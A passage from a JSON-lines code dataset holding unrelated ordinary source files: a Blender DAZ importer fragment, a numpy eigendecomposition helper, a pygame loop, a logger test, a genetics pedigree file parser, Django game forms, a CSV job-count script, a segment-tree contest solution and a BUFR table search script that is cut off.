DAZ_OT_ChangeCategory,\r\n DAZ_OT_Prettify,\r\n DAZ_OT_ForceUpdate,\r\n DAZ_OT_ActivateAll,\r\n DAZ_OT_DeactivateAll,\r\n DAZ_OT_ClearMorphs,\r\n DAZ_OT_UpdateMorphs,\r\n DAZ_OT_AddKeysets,\r\n DAZ_OT_KeyMorphs,\r\n DAZ_OT_UnkeyMorphs,\r\n DAZ_OT_UpdatePropLimits,\r\n DAZ_OT_RemoveMorphDrivers,\r\n DAZ_OT_AddDriver,\r\n DAZ_OT_RemoveDriver,\r\n DAZ_OT_ToggleAllCats,\r\n DAZ_OT_PinProp,\r\n DAZ_OT_LoadMoho,\r\n DAZ_OT_DeleteLipsync,\r\n DAZ_OT_ConvertMorphsToShapes,\r\n\r\n #DazCategory,\r\n #DazCustomGroup,\r\n]\r\n\r\ndef initialize():\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n\r\n bpy.types.Object.DazCustomMorphs = BoolProperty(default = False)\r\n bpy.types.Object.DazCustomPoses = BoolProperty(default = False)\r\n\r\n bpy.utils.register_class(DazCustomGroup)\r\n bpy.utils.register_class(DazCategory)\r\n\r\n bpy.types.Object.DazMorphCats = CollectionProperty(type = DazCategory)\r\n bpy.types.Object.DazPoseCats = CollectionProperty(type = DazCategory)\r\n\r\n bpy.types.Scene.DazMorphCatsOpen = BoolProperty(default = False)\r\n bpy.types.Scene.DazPoseCatsOpen = BoolProperty(default = False)\r\n\r\n bpy.types.Scene.DazMorphCatsContent = EnumProperty(\r\n items = [],\r\n name = \"Morph\")\r\n bpy.types.Scene.DazPoseCatsContent = EnumProperty(\r\n items = [],\r\n name = \"Pose\")\r\n\r\n bpy.types.Scene.DazNewCatName = StringProperty(\r\n name = \"New Name\",\r\n default = \"Name\")\r\n\r\n\r\n\r\ndef uninitialize():\r\n for cls in classes:\r\n bpy.utils.unregister_class(cls)\r\n\r\n bpy.utils.unregister_class(DazCustomGroup)\r\n bpy.utils.unregister_class(DazCategory)\r\n","repo_name":"Diffeomorphic/import-daz","sub_path":"morphing.py","file_name":"morphing.py","file_ext":"py","file_size_in_byte":59328,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"10593127011","text":"import numpy as np\ndef smart_eigenvalue_decomposition_covariance(features: np.ndarray):\n \"\"\"\n Lemma 28: Efficient Eigen value decomposition\n :param n: normalization\n :param features: features used to create covariance matrix times x P\n :param T: Weight used to normalize matrix\n :return: Left eigenvectors PxT and eigenvalues without zeros\n \"\"\"\n [T, P] = features.shape\n\n if P > T:\n covariance = features @ features.T /T\n\n else:\n covariance = features.T @ features / T\n\n eigval, eigvec = np.linalg.eigh(covariance)\n # eigvec = eigvec[:, eigval > 10 ** (-10)]\n # eigval = eigval[eigval > 10 ** (-10)]\n\n if P > T:\n # project features on normalized eigenvectors\n eigvec = features.T @ eigvec * (eigval ** (-1 / 2)).reshape(1, -1) / np.sqrt(T)\n\n return eigval, eigvec\n","repo_name":"AntoineDidisheim/didipack","sub_path":"didipack/utils_didi/smart_algebra.py","file_name":"smart_algebra.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42591540581","text":"import pygame\nimport eventer\nimport settings as st\nimport engineUI as eui\nimport UniPy as pe\n\ndraws = {\n -1: eui.drawProjects,\n 0: eui.drawUI,\n 1: eui.drawApp,\n 2: eui.drawCR,\n 3: eui.drawPAC,\n 4: eui.drawExportProject\n}\n\nwhile 1:\n pe.deltaTime = st.clock.tick(st.fps) / 1000.0\n st.win.fill(st.uiBgColor)\n st.MP = pygame.mouse.get_pos()\n \n for event in pygame.event.get():\n eventer.check_event(event)\n \n eui.srollObjectComponents()\n draws[st.drawingLayer]()\n \n messages_to_remove = []\n for msg in eui.message.messages:\n if msg.ifDel:\n messages_to_remove.append(msg)\n else:\n msg.update()\n for msg in messages_to_remove:\n eui.message.messages.remove(msg)\n \n try: pygame.display.flip()\n except: pass","repo_name":"AlmazCode/UniPy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36959350313","text":"import unittest\n\nimport clevokeyboardcontrol.logger as logger\n\nimport logging\nimport io\n\n\nclass LoggerTest(unittest.TestCase):\n def setUp(self):\n ## Called before testfunction is executed\n self.logger = logging.Logger(__name__)\n self.logger.propagate = False\n self.logger.setLevel( logging.DEBUG )\n self.buffer = io.StringIO()\n handler = logging.StreamHandler( self.buffer )\n formatter = logger.createFormatter()\n handler.setFormatter( formatter )\n self.logger.addHandler( handler )\n\n def tearDown(self):\n ## Called after testfunction was executed\n self.logger = None\n self.buffer.close()\n self.buffer = None\n\n def test_emptyMessage(self):\n self.logger.info(\"\")\n msg = self.buffer.getvalue()\n self.assertEqual(msg, \"\\n\")\n\n def test_newLines_Linux(self):\n self.logger.info(\"\\n\\n\\n\")\n msg = self.buffer.getvalue()\n self.assertEqual(msg, \"\\n\\n\\n\\n\")\n\n def test_newLines_Windows(self):\n self.logger.info(\"\\r\\n\\r\\n\\r\\n\")\n msg = self.buffer.getvalue()\n self.assertEqual(msg, \"\\r\\n\\r\\n\\r\\n\\n\")\n","repo_name":"anetczuk/ClevoKeyboardControl","sub_path":"src/testclevokeyboardcontrol/test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"22115465024","text":"from .. import utils\n\nimport errno\nimport re\nimport os\nimport csv\n\n###############################################################################\n# TO MATCH THE MERLIN documentation\n\nclass Individual(object):\n __slots__ = [ '__famID', '__indivID', '__fatherID', '__motherID', '__gender', '__features' ]\n def __init__(self, famID, indivID, fatherID, motherID, gender, features):\n self.__famID = str(famID)\n self.__indivID = str(indivID)\n self.__fatherID = fatherID\n self.__motherID = motherID\n self.__gender = gender\n self.__features = features\n #edef\n\n def __str__(self):\n dstr = \"Pedigree Individual\\n\"\n dstr += \" Family ID: %s\\n\" % self.__famID\n dstr += \" Individual ID: %s\\n\" % self.__indivID\n dstr += \" Mother/Father ID: %s/%s\\n\" % (self.__motherID, self.__fatherID)\n dstr += \" Gender: %s\\n\" % self.__gender\n dstr += \" Affection status:\\n\"\n for affection in self.__features.affections:\n dstr += \" %s : %s\" % (self.__features.getFeatureName(affection), self.__features[affection])\n #efor\n\n return dstr\n #edef\n\n def toRow(self):\n row = [self.__famID, self.__indivID, \n self.__fatherID if self.__fatherID is not None else '0',\n self.__motherID if self.__motherID is not None else '0',\n self.__gender] + self.__features.raw\n return row\n #edef\n\n @staticmethod\n def fromRow(row, datFormat):\n row = [ e.strip() for e in row ]\n famID = str(row[0])\n indivID = str(row[1])\n father = None if row[2] == '0' else row[2]\n mother = None if row[3] == '0' else row[3]\n gender = 'm' if (row[4] in [ '1', 'm' ]) else 'f'\n\n features = PhenoGenotype(row[5:], datFormat)\n return Individual(famID, indivID, father, mother, gender, features)\n #edef\n\n @property\n def famID(self):\n return self.__famID\n #edef\n\n @property\n def ID(self):\n return self.__indivID\n #edef\n\n def setID(self, newID):\n self.__indivID = newID\n #edef\n\n @property\n def fatherID(self):\n return self.__fatherID\n #edef\n\n def setFather(self, newID):\n self.__fatherID = newID\n #edef\n\n @property\n def motherID(self):\n return self.__motherID\n #edef\n\n def setMother(self, newID):\n self.__motherID = newID\n #edef\n\n @property\n def gender(self):\n return self.__gender\n #edef\n\n @property\n def features(self):\n return self.__features\n #edef\n\n @property\n def isFounder(self):\n return (self.fatherID is None) and (self.motherID is None)\n #edef\n\n def getFeature(self, feature):\n return self.__features[feature]\n #edef\n\n def setFeature(self, feature, value):\n self.__features[feature] = value\n #edef\n\n def copy(self, datFormat):\n features = self.__features.copy(datFormat)\n return Individual(self.famID, self.__indivID, self.__fatherID, self.motherID, self.gender, features)\n #edef\n\n#eclass\n\n###############################################################################\n\nclass PhenoGenotype(object):\n __slots__ = [ '__row', '__datFormat' ]\n def __init__(self, row, datFormat):\n\n self.__row = row\n self.__datFormat = datFormat\n\n nFeaturesRow = len(row)\n nFeaturesDat = len(datFormat)\n\n fixedRow = { datFormat.getFeatureName(i) : datFormat.emptyValueOfField(i) for i in range(nFeaturesDat) }\n rowIndex = 0\n datIndex = 0\n while datIndex < nFeaturesDat:\n if rowIndex >= nFeaturesRow:\n break\n #fi\n featureName = datFormat.getFeatureName(datIndex)\n featureType = self.__datFormat.getFeatureType(datIndex)\n if (featureType == 'm') and ('/' not in row[rowIndex]):\n fixedRow[featureName] = '%s/%s' % (row[rowIndex], row[rowIndex+1])\n rowIndex += 2\n datIndex += 1\n else:\n fixedRow[featureName] = row[rowIndex]\n rowIndex += 1\n datIndex += 1\n #fi\n #ewhile\n\n self.__row = fixedRow\n\n if rowIndex < nFeaturesRow:\n utils.error(\"More provided features than in DAT file. IGNORED!\")\n elif datIndex < nFeaturesDat:\n utils.error(\"More DAT features than provided. Filling with unknown values. Verify your PED/DAT file.\")\n #fi\n #edef\n\n @property\n def raw(self):\n row = [ str(self.__row[featureName]) for (featureType, featureName) in self.__datFormat ]\n return row\n #edef \n\n def __getitem__(self, identifier):\n if isinstance(identifier, int):\n fieldName = self.__datFormat.getFeatureName(identifier)\n if fieldName is None:\n return None\n #fi\n return self.__row[fieldName]\n elif isinstance(identifier, str):\n return self.__row[identifier]\n #fi\n return None\n #edef\n\n def __len__(self):\n return len(self.__row) if self.__row is not None else 0\n #edef\n\n def __setitem__(self, key, value):\n if isinstance(key, int):\n fieldName = self.__datFormat.getFeatureName(key)\n if fieldName is None:\n return None\n #fi\n self.__row[fieldName] = value\n elif isinstance(key, str):\n self.__row[key] = value\n #fi\n return None\n #edef\n\n def getFeatureName(self, identifier):\n return self.__datFormat[identifier][2]\n #edef\n\n @property\n def affections(self):\n return self.__datFormat.affections\n #edef\n\n @property\n def covariates(self):\n return self.__datFormat.covariates\n #edef\n\n @property\n def traits(self):\n return self.__datFormat.traits\n #edef\n\n @property\n def markers(self):\n return self.__datFormat.markers\n #edef\n\n def emptyValueOfField(self, fieldID):\n return self.__datFormat.emptyValueOfField(self, fieldID)\n #edef\n\n def __str__(self):\n dstr = \"Genotype and Phenotype Object\\n\"\n for fieldName in self.__row:\n dstr += \" %s: %s\\n\" % (fieldName, self.__row[fieldName])\n #efor\n return dstr\n #edef\n\n def copy(self, datFormat):\n return PhenoGenotype(self.raw, datFormat)\n #edef\n\n#eclass\n\n###############################################################################\n\nclass Family(object):\n slots = [ '__famID', '__members', '__datFormat' ]\n def __init__(self, famID, datFormat, members=[]):\n self.__famID = str(famID)\n self.__datFormat = datFormat\n if isinstance(members, dict):\n self.__members = members\n else:\n self.__members = { member.ID : member for member in members }\n #fi\n #edef\n\n def __str__(self):\n dstr = \"\"\n dstr += \"Pedigree Family\\n\"\n dstr += \" Members: %d\\n\" % len(self.__members)\n dstr += \" Founders: %d\\n\" % self.nFounders\n return dstr\n #edef\n\n def __contains__(self, memberID):\n return str(memberID) in self.__members\n #fi\n\n @property\n def famID(self):\n return self.__famID\n #edef\n\n def add(self, individual):\n if isinstance(individual, Individual):\n if individual.ID in self.__members:\n utils.dbm(\"Overwriting individual '%s' in family '%s'\" % (individual.ID, self.famID))\n #fi\n self.__members[individual.ID] = individual\n else:\n utils.error(\"Cannot add this object to family\")\n #fi\n #edef\n\n def newMember(self, indivID, fatherID, motherID, gender):\n if isinstance(fatherID, Individual):\n if fatherID.famID != self.famID:\n utils.error(\"Family ID of father (%s) is not this family: '%s'\" %(father.famID, self.famID))\n return None\n #fi\n fatherID = fatherID.ID\n elif (fatherID is not None) and (fatherID not in self.__members):\n utils.warning(\"FatherID '%s' is not present in this family.\" % fatherID)\n #fi\n if isinstance(motherID, Individual):\n if motherID.famID != self.famID:\n utils.error(\"Family ID of mother (%s) is not this family: '%s'\" %(mother.famID, self.famID))\n return None\n #fi\n motherID = motherID.ID\n elif (motherID is not None) and (motherID not in self.__members):\n utils.warning(\"MotherID '%s' is not present in this family.\" % motherID)\n #fi\n\n features = PhenoGenotype([], self.__datFormat)\n newPerson = Individual(self.famID, indivID, fatherID, motherID, gender, features)\n self.add(newPerson)\n return newPerson\n #edef\n\n def delMember(self, memberID):\n memberID = str(memberID)\n if memberID in self.__members:\n del self.__members[memberID]\n for member in self.__members:\n if self.__members[member].motherID == memberID:\n self.__members[member].setMother(None)\n elif self.__members[member].fatherID == memberID:\n self.__members[member].setFather(None)\n #fi\n #efor\n #fi\n #edef\n\n def __len__(self):\n return len(self.__members)\n #edef\n\n def __iadd__(self, individual):\n self.add(individual)\n #edef\n\n @property\n def nFounders(self):\n return len([m for m in self.__members.values() if m.isFounder])\n #edef\n\n @property\n def members(self):\n return self.__members\n #edef\n\n def __iter__(self):\n return self.__members.__iter__()\n #edef\n\n def __getitem__(self, key):\n return self.members[key]\n #edef\n\n def changeMemberID(self, currentID, newID):\n if currentID not in self.__members:\n utils.warning(\"Cannot change name of '%s', no such member.\" % currentID)\n return\n #fi\n self.__members[newID] = self.__members[currentID]\n self.__members[newID].setID(newID)\n del self.__members[currentID]\n\n for memberID in self.__members:\n if memberID != newID:\n if self.__members[memberID].motherID == currentID:\n self.__members[memberID].setMother(newID)\n elif self.__members[memberID].fatherID == currentID:\n self.__members[memberID].setFather(newID)\n #fi\n #fi\n #efor\n #edef\n\n def copy(self, datFormat):\n members = { memberID: self.__members[memberID].copy(datFormat) for memberID in self.__members }\n return Family(self.famID, datFormat, members)\n #edef\n\n#eclass\n \n############################################################################### \n\nclass DAT(object):\n\n __slots__ = [ '__fields', '__mask', '__types', '__names', '__fileName' ]\n\n def __init__(self, data, delimiter=' ', quotechar='#', mask=None):\n\n self.__fields = None\n self.__types = None\n self.__names = None\n self.__fileName = None\n self.__mask = None\n\n fields = []\n if isinstance(data, str):\n with open(data, 'r') as ifd:\n reader = csv.reader(ifd, delimiter=delimiter, quotechar=quotechar)\n for row in reader:\n row = [ col for col in row if col != \"\" ]\n if len(row) != 2:\n continue\n #fi\n fieldType = row[0].lower()\n fieldValue = row[1]\n if fieldType == 'e':\n break\n #fi\n if fieldType not in [ 'a', 'c', 't', 'm', 's' ]:\n utils.warning(\"Unknown fieldType '%s'\" % fieldType)\n fieldType = 's'\n #fi\n fields.append((fieldType, fieldValue))\n #efor\n #ewith\n self.__fields = fields\n self.__fileName = data\n else:\n self.__fields = data\n #fi\n\n if (mask is None) or len(mask) != len(self.__fields):\n self.__mask = [ False for field in self.__fields ]\n else:\n self.__mask = mask\n #fi\n self.__indexFields()\n #edef\n\n def __indexFields(self):\n self.__types = {}\n self.__names = {}\n for i, (fieldType, fieldName) in enumerate(self.__fields):\n fieldType = fieldType.lower()\n if fieldType not in self.__types:\n self.__types[fieldType] = []\n #fi\n self.__types[fieldType].append(i)\n self.__names[fieldName] = i\n #efor\n\n def add(self, fieldType, fieldName):\n if fieldName in self.__names:\n utils.error(\"Field '%s' already exists.\" % fieldName)\n return\n #fi\n fieldType = fieldType.lower()\n if fieldType not in 'actms':\n utils.error(\"'%s' not a valid field type.\" % fieldType)\n else:\n self.__fields.append((fieldType, fieldName))\n self.__indexFields()\n self.__mask.append(False)\n #fi\n #edef\n\n @property\n def affections(self):\n return self.__types['a'] if 'a' in self.__types else []\n #edef\n\n def emptyFeatures(self):\n return [ self.emptyValueOfField(fieldType) for (fieldType, fieldName) in self.__fields ]\n #edef\n\n @property\n def covariates(self):\n return self.__types['c'] if 'c' in self.__types else []\n #edef\n\n @property\n def traits(self):\n return self.__types['t'] if 't' in self.__types else []\n #edef\n\n @property\n def markers(self):\n return self.__types['m'] if 'm' in self.__types else []\n #edef\n\n def __getitem__(self, identifier):\n if isinstance(identifier, int):\n fieldType, fieldName = self.__fields[identifier]\n return (identifier, fieldType, fieldName)\n elif isinstance(identifier, str):\n fieldID = self.__names[identifier]\n fieldType, fieldName = self.__fields[fieldID]\n return (fieldID, fieldType, fieldName)\n else:\n return None\n #fi\n #edef\n\n def __len__(self):\n return len(self.__fields)\n\n def __iter__(self):\n return self.__fields.__iter__()\n #edef\n\n def keys(self):\n return self.__names\n #edef\n\n def __contains__(self, field):\n return field in self.__names\n #edef\n\n def getFeatureType(self, field):\n fieldID, fieldType, fieldName = self[field]\n return fieldType\n #eidef\n\n def setFeatureType(self, field, newFieldType):\n fieldID, fieldType, fieldName = self[field]\n newFieldType = newFieldType.lower()\n if newFieldType in [ 'a', 'c', 't', 'm', 's' ]:\n self.__fields[fieldID] = (newFieldType, fieldName)\n else:\n utils.error(\"Invalid feature type '%s'.\" % newFieldType)\n #edef\n\n def getFeatureName(self, field):\n fieldID, fieldType, fieldName = self[field]\n return fieldName\n #eidef\n\n def getFeatureID(self, fieldName):\n fieldID, fieldType, fieldName = self[fieldName]\n return fieldID\n #edef\n\n def maskFeature(self, featureName):\n featureID, featureType, featureName = self[featureName]\n self.__mask[featureID] = True\n #edef\n\n def unmaskFeature(self, featureName, newFeatureType=None):\n featureID, featureType, featureName = self[featureName]\n self.__mask[featureID] = False\n if newFeatureType is not None:\n self.setFeatureType(featureName, newFeatureType)\n self.__mask[featureID] = False\n #edef\n\n def detectType(self, value):\n if ('/' in value) or ( ' ' in value):\n return 'm'\n elif value.upper() == 'X':\n return 't'\n elif value in [ '0', '1', '2' ]:\n return 'a'\n else:\n return 's'\n #fi\n #edef\n\n def emptyValueOfField(self, fieldID):\n fieldID, fieldType, fieldName = self[fieldID]\n\n if fieldType == 'a':\n return 'X'\n elif fieldType == 'c':\n return 'X'\n elif fieldType == 't':\n return 'X'\n elif fieldType == 'm':\n return '0/0'\n elif fieldType == 's':\n return 'X'\n else:\n return '0'\n #fi\n #edef\n\n def write(self, fileName):\n with open(fileName, \"w\") as ofd:\n for i, (fieldType, fieldName) in enumerate(self.__fields):\n fieldType = 'S' if self.__mask[i] else fieldType.upper()\n ofd.write(\"%s %s\\n\" % (fieldType, fieldName))\n #efor\n ofd.write(\"E\\tEND-OF-DATA\\n\")\n self.__fileName = fileName\n #ewith\n #edef\n\n def copy(self):\n return DAT([ (fieldType, fieldName) for (fieldType, fieldName) in self.__fields], mask=self.__mask)\n #edef\n\n#eclass\n\n###############################################################################\n\nclass PED(object):\n\n __slots__ = [ 'families', '__fileName', '__datFile', '__datFormat' ]\n\n def __init__(self, data, datFile=None, datFormat=None, **kwargs):\n\n self.families = {}\n self.__fileName = None\n self.__datFile = datFile\n self.__datFormat = None\n\n if datFormat is not None:\n self.__datFormat = datFormat\n elif isinstance(datFile, str):\n self.__datFormat = DAT(datFile)\n self.__datFile = datFile\n else:\n utils.warning(\"You must provide a DAT file to match. I will try to guess them!\")\n self.__datFormat = DAT([])\n self.__datFile = None\n #fi\n\n if isinstance(data, str):\n self.families = PED.fromFile(data, self.__datFormat)\n self.__fileName = data\n elif isinstance(data, dict):\n self.families = data\n elif isinstance(data, Family):\n self.families = { data.famID : data }\n else:\n self.families = { f.famID for f in data }\n #fi\n #edef\n\n def __contains__(self, famID):\n return str(famID) in self.families\n #edef\n\n def __getitem__(self, famID):\n famID = str(famID)\n if famID in self.families:\n return self.families[famID]\n #fi\n return None\n #edef\n\n def __delitem__(self, famID):\n famID = str(famID)\n if famID in self.families:\n del self.families[famID]\n #fi\n #edef\n\n def subset(self, famIDs):\n datFormatCopy = self.__datFormat.copy()\n if isinstance(famIDs, str) or isinstance(famIDs, int):\n famIDs = [ famIDs ]\n #fi\n famIDs = [ str(famID) for famID in famIDs ]\n retFams = { famID : self.families[famID].copy(datFormatCopy) for famID in famIDs if (famID in self.families)}\n return PED(data = retFams, datFormat=datFormatCopy)\n #edef\n\n def emptyFeatures(self):\n self.__datFormat.emptyFeatures()\n #edef\n\n #def delFeature(self, featureName)\n #def renameFeature(self, featureName)\n def maskFeature(self, feature):\n self.__datFormat.maskFeature(feature)\n #edef\n \n def unmaskFeature(self, feature, newFeatureType=None):\n self.__datFormat.unmaskFeature(feature, newFeatureType)\n #edef\n\n\n def addFeature(self, featureType, featureName, defaultValue=None):\n self.__datFormat.add(featureType, featureName)\n emptyValue = self.__datFormat.emptyValueOfField(featureName) if defaultValue is None else defaultValue\n\n for famID in self:\n for memberID in self[famID]:\n self[famID][memberID].setFeature(featureName, emptyValue)\n #efor\n #efor\n #edef\n\n def features(self):\n return self.__datFormat.keys()\n #edef\n\n def getFeature(self, featureName):\n values = {}\n if featureName not in self.__datFormat:\n utils.error(\"Feature '%s' doesn't exist.\" % featureName)\n return values\n #fi\n\n for famID in self.families:\n family = self[famID]\n for memberID in family:\n values[(famID, memberID)] = family[memberID].getFeature(featureName)\n #efor\n #efor\n return values\n #edef\n\n def __iter__(self):\n return self.families.__iter__()\n #edef\n\n def newFamily(self, famID):\n famID = str(famID)\n if famID in self.families:\n utils.warning(\"Overwriting family '%s'.\" % famID)\n #fi\n self.families[famID] = Family(famID, self.__datFormat, [])\n return self.families[famID]\n #edef\n\n @staticmethod\n def fromFile(fileName, datFormat, delimiter='\\t', quotechar='#', nrows=None, **kwargs):\n irow = 0\n families = {}\n with open(fileName, 'r') as ifd:\n rePattern = re.compile(r\"[\\s]+\")\n \n for line in ifd:\n row = [ col for col in rePattern.split(line) if col != \"\" ]\n irow = irow + 1\n if (nrows is not None) and (irow > nrows):\n utils.dbm(\"I will; break here\")\n break\n #fi\n if len(row) < 5:\n break\n #fi\n \n indiv = Individual.fromRow(row, datFormat)\n if indiv.famID not in families:\n families[indiv.famID] = Family(indiv.famID, datFormat, [indiv])\n else:\n families[indiv.famID].add(indiv)\n #fi\n #efor\n #ewith\n return families\n #edef\n\n @property\n def nFeatures(self):\n return len(self.__datFormat)\n #edef\n\n def __str__(self):\n dstr = \"PED object\\n\"\n dstr += \" Where: %s\\n\" % (self.__fileName if self.__fileName is not None else hex(id(self)))\n dstr += \" DAT file: %s\\n\" % (self.__datFile if self.__datFile is not None else hex(id(self.__datFormat)))\n dstr += \" Families: %d\\n\" % len(self.families)\n dstr += \" Founders: %d\\n\" % sum([ self.families[famID].nFounders for famID in self.families ])\n dstr += \" Total: %d\\n\" % ( sum([ len(self.families[famID]) for famID in self.families ]) )\n dstr += \" Features: %d\\n\" % (self.nFeatures)\n dstr += \" Affections: %d\\n\" % len(self.__datFormat.affections)\n dstr += \" Covariates: %d\\n\" % len(self.__datFormat.covariates)\n dstr += \" Traits: %d\\n\" % len(self.__datFormat.traits)\n dstr += \" Markers: %d\\n\" % len(self.__datFormat.markers)\n\n return dstr\n #edef\n\n def write(self, fileName, datFileName=None):\n\n if datFileName is None:\n if fileName[-3:].lower() == 'ped':\n datFileName = fileName[:-3] + 'dat'\n else:\n datFileName = fileName + '.dat'\n #fi\n #fi\n\n with open(fileName, 'w') as ofd:\n for famID in self.families:\n for memberID in self.families[famID].members:\n member = self.families[famID][memberID]\n row = member.toRow()\n ofd.write('\\t'.join(row) + '\\n')\n #efor\n #efor\n self.__fileName = fileName\n #ewith\n\n self.__datFormat.write(datFileName)\n #edef\n\n standardValues = {\n 'affected_true' : 2,\n 'affected_false' : 1,\n 'affected_unknown' : 0,\n }\n\n#eclass\n","repo_name":"thiesgehrmann/BIU","sub_path":"biu/formats/pedUtils.py","file_name":"pedUtils.py","file_ext":"py","file_size_in_byte":20889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71068319505","text":"import json\nimport random\nfrom django import forms\nfrom .models import Settlers\n\n\nclass SubmitError(Exception):\n pass\n\n\nclass JSONField(forms.CharField):\n widget = forms.HiddenInput\n\n def clean(self, value):\n value = super().clean(value)\n return json.loads(value) if value else value\n\n\nclass SettlersNewGameForm(forms.ModelForm):\n game = JSONField()\n\n class Meta:\n model = Settlers\n fields = ['game', 'player_profiles']\n widgets = {\n 'player_profiles': forms.CheckboxSelectMultiple\n }\n labels = {\n 'player_profiles': 'Players'\n }\n\n def save(self):\n instance = super().save()\n player_profiles = list(instance.player_profiles.all())\n random.shuffle(player_profiles)\n\n colors = ['red', 'blue', 'orange', 'white']\n if len(player_profiles) > 4:\n colors.extend(['green', 'brown'])\n random.shuffle(colors)\n\n players = []\n for profile in player_profiles:\n player_color = None\n if profile.favorite_colors:\n for color in profile.favorite_colors.split(','):\n if color in colors:\n player_color = color\n break\n player_color = player_color or colors[0]\n players.append({'id': profile.user.id, 'name': str(profile), 'color': player_color})\n colors.remove(player_color)\n\n instance.game['players'] = players\n instance.game['turns'] = []\n instance.save()\n return instance\n\n def clean_player_profiles(self):\n player_profiles = self.cleaned_data['player_profiles']\n print(player_profiles)\n if len(player_profiles) not in [3,4]:\n raise forms.ValidationError('You must select 3 or 4 players to begin')\n\n return player_profiles\n\n\nclass SettlersTurnForm(forms.ModelForm):\n turn = JSONField()\n trade = JSONField(required=False)\n\n class Meta:\n model = Settlers\n fields = ['turn', 'trade']\n\n def clean(self):\n turn = self.cleaned_data['turn']\n if turn['roll'] != self.instance.game['nextRoll']:\n raise SubmitError(400)\n\n return self.cleaned_data\n\n\nclass SettlersAcceptTradeForm(forms.ModelForm):\n response = JSONField()\n\n class Meta:\n model = Settlers\n fields = ['response']\n","repo_name":"dakrauth/django-settlers","sub_path":"src/settlers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9600557294","text":"\r\nimport csv\r\n\r\nwith open(\"C:\\\\Users\\\\Sahil\\\\Downloads\\\\amazon_jobs_dataset.csv\", encoding ='UTF-8') as file_obj:\r\n csv_obj = csv.DictReader(file_obj,skipinitialspace=True)\r\n list1=list(csv_obj)\r\n# print(csv_obj)\r\n# cnt_ban=0\r\n# cnt_canada=0\r\n\r\ndict={}\r\n\r\nfor row in list1:\r\n str=row['Posting_date'].split(',')[-1].strip()\r\n # print(str)\r\n if str=='2018':\r\n mon=row['Posting_date'].split(',')[0].strip().split()[0]\r\n # key=mon\r\n dict[mon]=dict.get(mon,0) +1\r\n\r\n# print(dict)\r\nhighest_mon=''\r\nhighest_val=0\r\n\r\nfor k,v in dict.items():\r\n if v>=highest_val:\r\n highest_mon=k\r\n highest_val=v\r\n\r\n\r\nprint (highest_mon,' ',highest_val)\r\n","repo_name":"malhotrasahil/coding_ninjas","sub_path":"pycharm/file/amazon_job_month_2018.py","file_name":"amazon_job_month_2018.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121284946","text":"# https://atcoder.jp/contests/abl/submissions/17044531\n# D - Flat Subsequence\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\nclass SegTree:\n \"\"\"\n init(init_val, ide_ele): 配列init_valで初期化 O(N)\n update(k, x): k番目の値をxに更新 O(N)\n query(l, r): 区間[l, r)をsegfuncしたものを返す O(logN)\n \"\"\"\n def __init__(self, init_val, segfunc, ide_ele):\n \"\"\"\n init_val: 配列の初期値\n segfunc: 区間にしたい操作\n ide_ele: 単位元\n n: 要素数\n num: n以上の最小の2のべき乗\n tree: セグメント木(1-index)\n \"\"\"\n n = len(init_val)\n self.segfunc = segfunc\n self.ide_ele = ide_ele\n self.num = 1 << (n - 1).bit_length()\n self.tree = [ide_ele] * 2 * self.num\n # 配列の値を葉にセット\n for i in range(n):\n self.tree[self.num + i] = init_val[i]\n # 構築していく\n for i in range(self.num - 1, 0, -1):\n self.tree[i] = self.segfunc(self.tree[2 * i], self.tree[2 * i + 1])\n\n def update(self, k, x):\n \"\"\"\n k番目の値をxに更新\n k: index(0-index)\n x: update value\n \"\"\"\n k += self.num\n self.tree[k] = x\n while k > 1:\n self.tree[k >> 1] = self.segfunc(self.tree[k], self.tree[k ^ 1])\n k >>= 1\n\n def query(self, left, right):\n \"\"\"\n [left, right)のsegfuncしたものを得る\n left: index(0-index)\n right: index(0-index)\n \"\"\"\n res = self.ide_ele\n left += self.num\n right += self.num\n while left < right:\n if left & 1:\n res = self.segfunc(res, self.tree[left])\n left += 1\n if right & 1:\n res = self.segfunc(res, self.tree[right - 1])\n left >>= 1\n right >>= 1\n return res\n\n\ndef resolve():\n n, k = map(int, input().split())\n A = list(int(input()) for _ in range(n))\n MAX = max(A) + 1\n seg = SegTree([0 for _ in range(MAX)], lambda x, y: max(x, y), -f_inf)\n res = [0] * MAX\n for a in A:\n left = max(0, a - k)\n right = min(MAX + 1, a + k + 1)\n ma = seg.query(left, right)\n seg.update(a, ma + 1)\n res[a - 1] = ma + 1\n\n print(max(res))\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"ABC/ACLBC/ACLBC_D.py","file_name":"ACLBC_D.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24496687991","text":"from __future__ import print_function\nfrom pybufr_ecmwf.bufr_table import BufrTable\n\nBTABLE = 'pybufr_ecmwf/ecmwf_bufrtables/B2550000000098006001.TXT'\nSEARCH_STRING = 'WMO'\n\nBT = BufrTable()\nBT.load(BTABLE)\n\nprint('seaching for descriptors that contain substring: ', SEARCH_STRING)\n\nKEYS = BT.table_b.keys()\nfor k in sorted(KEYS):\n obj = BT.get_descr_object(k)\n if SEARCH_STRING in obj.name:\n # this is not python 2.6 compatible\n #print('descriptor: {:06d} name: {}'.format(k, obj.name))\n # so use this in stead\n print('descriptor: %06d name: %s' % (k, 